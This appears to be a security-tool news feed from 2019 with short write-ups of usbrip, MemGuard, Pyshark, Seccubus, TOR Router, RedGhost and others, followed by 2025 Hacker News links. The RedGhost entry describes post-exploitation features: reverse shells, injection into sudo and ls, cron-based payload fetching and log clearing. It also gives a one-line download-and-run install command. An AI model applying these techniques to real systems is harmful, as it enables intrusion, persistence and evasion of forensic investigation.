Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.



l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.




Extra features

To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false


Disclaimer 

Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

Download Winrm

Article link

Date of publish: Wed, 31 Jul 2019 12:21:00 +0000

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.


usbrip (derived from "USB Ripper", not "USB R.I.P." astonished) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.

usbrip is a small piece of software written in pure Python 3 (using some external modules though, see Dependencies/PIP) which parses Linux log files (/var/log/syslog* or /var/log/messages* depending on the distro) for constructing USB event history tables. Such tables may contain the following columns: "Connected" (date & time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date & time).

Besides, it also can:
  • export gathered information as a JSON dump (and open such dumps, of course);
  • generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);
  • search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;
  • When installed with -s flag create crypted storages (7zip archives) to automatically backup and accumulate USB events with the help of crontab scheduler;
  • search additional details about a specific USB device based on its VID and/or PID.

Quick Start

usbrip is available for download and installation at PyPI:

$ pip3 install usbrip



Git Clone

For simplicity, lets agree that all the commands where ~/usbrip$ prefix is appeared are executed in the ~/usbrip directory which is created as a result of git clone:

~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip
~/usbrip$

Dependencies

usbrip works with non-modified structure of system log files only, so, unfortunately, it won't be able to parse USB history if you change the format of syslogs (with syslog-ng or rsyslog, for example). That's why the timestamps of "Connected" and "Disconnected" fields don't have the year, by the way. Keep that in mind.

DEB Packages

  • python3.6 (or newer) interpreter
  • python3-venv
  • p7zip-full (used by storages module)
  • ~$ sudo apt install -y python3-venv p7zip-full

PIP Packages

usbrip makes use of the following external modules:
  • terminaltables
  • termcolor

To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install -r requirements.txt

Or let the pipenv one-liner do all the dirty work for you:

~/usbrip$ pipenv install && pipenv shell

After that you can run usbrip portably:

(venv) ~/usbrip$ python -m usbrip -h
Or
(venv) ~/usbrip$ python __main__.py -h

Installation

There are two ways to install usbrip into the system: pip or setup.py.

pip or setup.py

First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install .

(venv) ~/usbrip$ usbrip -h

Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ python setup.py install

(venv) ~/usbrip$ usbrip -h

alien Note: you'd likely want to run the installation process while the Python virtual environment is active (like it is shown above).

install.sh

Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.

When using the ./installers/install.sh some extra features become available:
  • the virtual environment is created automatically;
  • the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).

Warning: if you are using the crontab scheduling, you want to configure the cron job with sudo crontab -e in order to force the storage update submodule run as root as well as protect the passwords of the USB event storages. The storage passwords are kept in /var/opt/usbrip/usbrip.ini.

The ./installers/uninstall.sh script removes all the installation artifacts from your system.

To install usbrip use:

~/usbrip$ chmod +x ./installers/install.sh
~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]
~/usbrip$ cd

~$ usbrip -h

  • When -l switch is enabled, Python dependencies are resolved from local .tar packages (./3rdPartyTools/) instead of PyPI.
  • When -s switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.

Note: when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).

After the installation completes, feel free to remove the usbrip folder.

Paths

When installed, the usbrip uses the following paths:
  • /opt/usbrip/ — project's main directory;
  • /var/opt/usbrip/usbrip.ini — usbrip configuration file: keeps passwords for 7zip storages;
  • /var/opt/usbrip/storage/ — USB event storages: history.7z and violations.7z (created during the installation process);
  • /var/opt/usbrip/log/ — usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);
  • /var/opt/usbrip/trusted/ — list of trusted USB devices (created during the installation process);
  • /usr/local/bin/usbrip — symlink to the /opt/usbrip/venv/bin/usbrip script.

cron

Cron jobs can be set as follows:

~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron
~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron
~/usbrip$ sudo crontab tmpcron
~/usbrip$ rm tmpcron

uninstall.sh

To uninstall usbrip use:

~/usbrip$ chmod +x ./installers/uninstall.sh
~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]

When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.

And don't forget to remove the cron job.

Usage

Synopsis

# ---------- BANNER ----------

$ usbrip banner
Get usbrip banner.

# ---------- EVENTS ----------

$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB event history.

$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Open USB event dump.

$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Generate a list of trusted (authorized) USB devices.

$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB violation events based on the list of trusted devices.

# ---------- STORAGE ----------

$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]
List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".

$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]
Open selected storage (7zip archive). Behaves similary to the EVENTS OPEN submodule.

$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].

$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Create storage — create 7zip archive and add USB events to it according to the selected options.

$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Change password of the existing storage.

# ---------- IDs ----------

$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]
Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.

$ usbrip ids download [-q] [--debug]
Update (download) the USB ID database.

Help

To get a list of module names use:

$ usbrip -h

To get a list of submodule names for a specific module use:

$ usbrip <module> -h

To get a list of all switches for a specific submodule use:

$ usbrip <module> <submodule> -h


Examples

Show the event history of all USB devices, supressing banner output, info messages and user interaction (-q, --quiet), represented as a list (-l, --list) with latest 100 entries (-n NUMBER, --number NUMBER):

$ usbrip events history -ql -n 100

Show the event history of the external USB devices (-e, --external, which were actually disconnected) represented as a table (-t, --table) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]) with logs taken from the outer files (-f FILE [FILE ...], --file FILE [FILE ...]):

$ usbrip events history -et -c conn vid pid disconn serial -d "Dec  9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz

Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT terminal stdout (| or > for example) there would be no ANSI escape characters (color) in the output so feel free to use it that way. Also notice that usbrip uses some UNICODE symbols so it would be nice to convert the resulting file to UTF-8 encoding (with encov for example) as well as change newline characters to Windows style for portability (with awk for example):

usbrip history events -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out

Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:

awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out

Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:

$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"

Search the event history of the external USB devices for violations based on the list of trusted USB devices (trusted/auth.json) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:

$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid

Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):

$ usbrip ids search --vid 0781 --pid 5580

Download the latest version of usb_ids/usb.ids database (the source is here):

$ usbrip ids download

Download USBrip

Article link

Date of publish: Mon, 29 Jul 2019 07:18:00 +0000

MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory



MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory


This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.

Features


  • Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.
  • Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.
  • Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.
  • Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.
  • Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.
  • Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.
  • Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.
  • Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.

Some features were inspired by libsodium, so credits to them.

Full documentation and a complete overview of the API can be found here. Interesting and useful code samples can be found within the examples subpackage.

Installation

$ go get github.com/awnumar/memguard

We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.

Contributing


  • Using the package and identifying points of friction.
  • Reading the source code and looking for improvements.
  • Adding interesting and useful program samples to ./examples.
  • Developing Proof-of-Concept attacks and mitigations.
  • Improving compatibility with more kernels and architectures.
  • Implementing kernel-specific and cpu-specific protections.
  • Writing useful security and crypto libraries that utilise memguard.
  • Submitting performance improvements or benchmarking code.

Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.

Future goals


  • Ability to stream data to and from encrypted enclave objects.
  • Catch segmentation faults to wipe memory before crashing.
  • Evaluate and improve the strategies in place, particularly for Coffer objects.
  • Formalise a threat model and evaluate our performance in regards to it.
  • Use lessons learned to apply patches upstream to the Go language and runtime.

Article link

Date of publish: Sun, 28 Jul 2019 13:14:00 +0000

iKy OSINT Project - To Collect Information From E-Mail With GUI


iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.


Project iKy is to collects information from an email and shows results in a nice visual interface.

Installation


Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

And turn on the server in a terminal

redis-server

Python stuff and Celery

You must install the libraries inside requirements.txt
pip install -r requirements.txt

And turn on Celery in another terminal, within the directory backend
./celery.sh

Finally, again, in another terminal turn on backend app from directory backend

python app.py

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend install the dependencies

npm install

Turn on Frontend Server

Finally, to run frontend server, execute:

npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Video Demo

Article link

Date of publish: Mon, 22 Jul 2019 08:22:00 +0000

RedGhost - Linux Post Exploitation Framework

RedGhost -  Linux Post Exploitation Framework

RedGhost- Linux post exploitation framework 


It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. 


  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion

  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence

  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make investigation with forensics difficult

  • MassInfoGrab
Function to grab mass reconaissance/information on system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute remote bash script in memory

  • BanIp
Function to BanIp using iptables

Installation

Install RedGhost in one line code:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One line code to Install prerequisites and RedGhost :

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g

Download Redghost

Article link

Date of publish: Fri, 19 Jul 2019 08:30:00 +0000

Pyshark- To Allowing Python Packet Parsing Using Wireshark Dissectors


Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.


Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those files read from their respective source and then can be used as an iterator to get their packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.

Installation

All Platforms

Simply run the following to install the latest from pypi

pip install pyshark

Or install from the git repository:

git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X

You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:

xcode-select --install
pip install libxml

You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:

>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print cap[0]
Packet (Length: 698)
Layer ETH:
        Destination: BLANKED
        Source: BLANKED
        Type: IP (0x0800)
Layer IP:
        Version: 4
        Header Length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
        Total Length: 684
        Identification: 0x254f (9551)
        Flags: 0x00
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (17)
        Header checksum: 0xe148 [correct]
        Source: BLANKED
        Destination: BLANKED
  ...

Other options

  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.
  • param tshark_path: Path of the tshark binary.

Reading from a live interface:

>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer

>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:

>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary

Accessing packet data:

Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.

All of the following work:

>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100

To test whether a layer is in a packet, you can use its name:

>>> 'IP' in packet
True

To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.

You can also get the original binary data of a field, or a pretty description of it:

>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures

Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).

>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')

A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.

>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')

Python2 deprecation - 

This package no longer supports Python2. If you wish to still use it in Python2, you can:

Use version 0.3.8

  • Install pyshark-legacy via pypi
  • Clone the pyshark-legacy [repo (https://github.com/KimiNewt/pyshark-legacy)], where bugfixes will be applied.


Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.

There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.

This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.

Download Pyshark

Article link

Date of publish: Tue, 16 Jul 2019 14:19:00 +0000

Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook


"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"


Learn how to hack systems like black hat hackers and secure them like security experts.

This eBook will help you:

  • Understand ethical hacking and the different fields and types of hackers
  • Set up a penetration testing lab to practice safe and legal hacking
  • Explore Linux basics, commands, and how to interact with the terminal
  • Access password-protected networks and spy on connected clients
  • Use server and client-side attacks to hack and control remote computers
  • Control a hacked system remotely and use it to hack other systems
  • Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections
  • Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!

Free offer expires 07/23/19.

Offered Free by: Packt

 DOWNLOAD NOW!
DOWNLOAD NOW

Article link

Date of publish: Wed, 10 Jul 2019 19:28:00 +0000

Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.

Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.

On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.

Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)

Docker

Available images.

         Image name                                   Purpose                         
  • seccubus                     Run a full Seccubus stack in a single container
  • seccubus-front            Serving just the front end HTML, javascript and css
  • seccubus-web             Serving front and code and API simultaniously
  • seccubus-api               Serving just the API.
  • seccubus-perl              Running command line scripts, e.g. to scan
  • seccubus-cron             Running cron deamon to execute scans


Information about the docker containers is here

Default password, changing it.

After installation the default username and password for seccubus is:

admin / GiveMeVulns!

It is highly recommended you change this after installation.

/bin/seccubus_passwd -u admin

Download Seccubus

Article link

Date of publish: Fri, 21 Jun 2019 14:05:00 +0000

TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR


TOR Router- A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code.

Tor Router allow you to use TOR as a transparent proxy and send all your traffic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.

TOR router doesn't touch system files as the rest of tools for routing your taffic does and the reason is: there isn't needed to move files for routing traffic, also moving files is a bad idea since that a fail in the script/tool can break your system connection without you knowing what has happened.

Script to install on distros using SystemD only

If you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command:

# pacman -S tor-router

To install from source:

Note that you need BASH, not sh

~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh

Usage

In distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.

It script require root privileges

1. Open a terminal and clone the script using the following command:
~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd tor-router/files

2. Put the following lines at the end of /etc/tor/torrc
# Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

3. Restart the tor service
4. Execute the tor-router script as root
# sudo ./tor-router

5. Now all your traffic is under TOR, you can check that in the following pages: https://check.torproject.org and for DNS tests: https://dnsleaktest.com

6. In order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.

Uninstalling/Stoping

Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.

Proof of concept

After of run the script, follow the next steps to ensure that all is working as expected:

IP hidden and TOR network configured: 
Visit https://check.torproject.org, you should see a message like it:


Checking DNS Leaks: 

Visit https://dnsleaktest.com and make a extended test to see what are your DNS. You shloud get some like it:


Distros using the script

BlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-router

Download TOR Router

Article link

Date of publish: Wed, 12 Jun 2019 11:00:00 +0000

Hacker News: Front Page

Qwen 3 now supports ARM and MLX
SkiftOS: A hobby OS built from scratch using C/C++ for ARM, x86, and RISC-V

Article URL: https://skiftos.org

Comments URL: https://news.ycombinator.com/item?id=45229414

Points: 33

# Comments: 7

Article link

Date of publish: Sat, 13 Sep 2025 04:55:14 +0000

Raspberry Pi Synthesizers – How the Pi is transforming synths

Article URL: https://www.gearnews.com/raspberry-pi-synthesizers-how-the-pi-is-transforming-synths/

Comments URL: https://news.ycombinator.com/item?id=45229227

Points: 14

# Comments: 5

Article link

Date of publish: Sat, 13 Sep 2025 04:08:57 +0000

Show HN: wcwidth-o1 – Find Unicode text cell width in no time for JavaScript/TS

I ported Markus Kuhn’s wcwidth to TypeScript and optimized it with bitset lookups for O(1) performance. It now covers the full Unicode 15.1 combining ranges.

GitHub: https://github.com/dawsonhuang0/Wcwidth-O1 NPM: https://www.npmjs.com/package/wcwidth-o1

Feedback welcome!


Comments URL: https://news.ycombinator.com/item?id=45228938

Points: 10

# Comments: 2

Article link

Date of publish: Sat, 13 Sep 2025 02:53:43 +0000

OCI Registry Explorer

Article URL: https://oci.dag.dev/

Comments URL: https://news.ycombinator.com/item?id=45228891

Points: 33

# Comments: 6

Article link

Date of publish: Sat, 13 Sep 2025 02:41:57 +0000

Chatbox app is back on the US app store

Article URL: https://github.com/chatboxai/chatbox/issues/2644

Comments URL: https://news.ycombinator.com/item?id=45228766

Points: 37

# Comments: 13

Article link

Date of publish: Sat, 13 Sep 2025 02:13:40 +0000

Legal win

Article URL: https://ma.tt/2025/09/legal-win/

Comments URL: https://news.ycombinator.com/item?id=45228692

Points: 150

# Comments: 108

Article link

Date of publish: Sat, 13 Sep 2025 01:55:23 +0000

California lawmakers pass SB 79, housing bill that brings dense housing
Life, work, death and the peasant: Rent and extraction
Meow: Yet another modal editing on Emacs

Article URL: https://github.com/meow-edit/meow

Comments URL: https://news.ycombinator.com/item?id=45228396

Points: 77

# Comments: 11

Article link

Date of publish: Sat, 13 Sep 2025 01:00:22 +0000

Tips for installing Windows 98 in QEMU/UTM

